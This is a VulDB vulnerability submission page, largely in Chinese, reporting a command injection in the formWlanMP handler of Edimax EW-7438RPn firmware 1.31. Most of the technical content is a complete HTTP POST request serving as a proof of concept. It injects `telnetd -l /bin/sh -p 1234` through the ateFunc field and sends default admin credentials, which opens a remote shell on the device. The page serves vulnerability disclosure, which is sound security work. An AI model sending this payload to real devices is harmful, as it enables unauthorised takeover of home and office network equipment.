提交 #813891: Edimax EW-7438RPn 1.31 Command Injection信息

标题	Edimax EW-7438RPn 1.31 Command Injection
描述	We found a command injection vulnerability in an Edimax extender with recently released firmware, which allows remote attackers to execute arbitrary OS commands via a crafted request.In formWlanMP function, ateFunc、ateGain、ateTxCount、ateChan、ateRate、ateMacID、e2pTxPower1、e2pTxPower2、e2pTxPower3、e2pTxPower4、e2pTxPower5、e2pTxPower6、e2pTxPower7、e2pTx2Power1、e2pTx2Power2、e2pTx2Power3、e2pTx2Power4、e2pTx2Power5、e2pTx2Power6、e2pTx2Power7、ateTxFreqOffset、ateMode、ateBW、ateAntenna、e2pTxFreqOffset、e2pTxPwDeltaB、e2pTxPwDeltaG、e2pTxPwDeltaMix、e2pTxPwDeltaN、readE2P is directly passed by the attacker, so we can control the ateFunc、ateGain、ateTxCount、ateChan、ateRate、ateMacID、e2pTxPower1、e2pTxPower2、e2pTxPower3、e2pTxPower4、e2pTxPower5、e2pTxPower6、e2pTxPower7、e2pTx2Power1、e2pTx2Power2、e2pTx2Power3、e2pTx2Power4、e2pTx2Power5、e2pTx2Power6、e2pTx2Power7、ateTxFreqOffset、ateMode、ateBW、ateAntenna、e2pTxFreqOffset、e2pTxPwDeltaB、e2pTxPwDeltaG、e2pTxPwDeltaMix、e2pTxPwDeltaN、readE2P to attack the OS. POST /goform/formWlanMP HTTP/1.1 Host: 192.168.0.4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 598 Origin: http://192.168.0.4 Authorization: Basic YWRtaW46MTIzNA== Connection: keep-alive Referer: http://192.168.0.4/wlanMP.asp Cookie: language=16 Upgrade-Insecure-Requests: 1 Priority: u=0, i submit-url=%2FwlanMP.asp&ateFunc=`telnetd -l /bin/sh -p 1234`&ateGain=10&ateTxCount=200&ateChan=1&ateAntenna=1&ateMode=0&ateRate=3&ateTxFreqOffset=FF&e2pTxFreqOffset=FF&ateBW=1&e2pChan1=46&e2pTxPower1=0C0C&e2pChan2=48&e2pTxPower2=0C0C&e2pChan3=4A&e2pTxPower3=0C0C&e2pChan4=4C&e2pTxPower4=0C0C&e2pChan5=4E&e2pTxPower5=0C0C&e2pChan6=50&e2pTxPower6=0C0C&e2pChan7=52&e2pTxPower7=0C0C&e2pTx2Power1=0C0C&e2pTx2Power2=0C0C&e2pTx2Power3=0C0C&e2pTx2Power4=0C0C&e2pTx2Power5=0C0C&e2pTx2Power6=0C0C&e2pTx2Power7=0C0C&e2pTxPwDeltaB=FF&e2pTxPwDeltaG=FF&e2pTxPwDeltaN=FF&e2pTxPwDeltaMix=FFFF&readE2P=0C&e2pValue=
来源	⚠️ https://github.com/wudipjq/my_vuln/blob/main/Edimax/vuln_7/7.md
用户	Bond_yes (UID 89043)
提交	2026-04-27 07時44分 (1 月前)
管理	2026-05-24 08時59分 (27 days later)
状态	已接受
VulDB条目	365405 [Edimax EW-7438RPn 1.31 Content-Type /goform/formWlanMP 权限提升]
积分	20

◂ 上一步一览下一步 ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!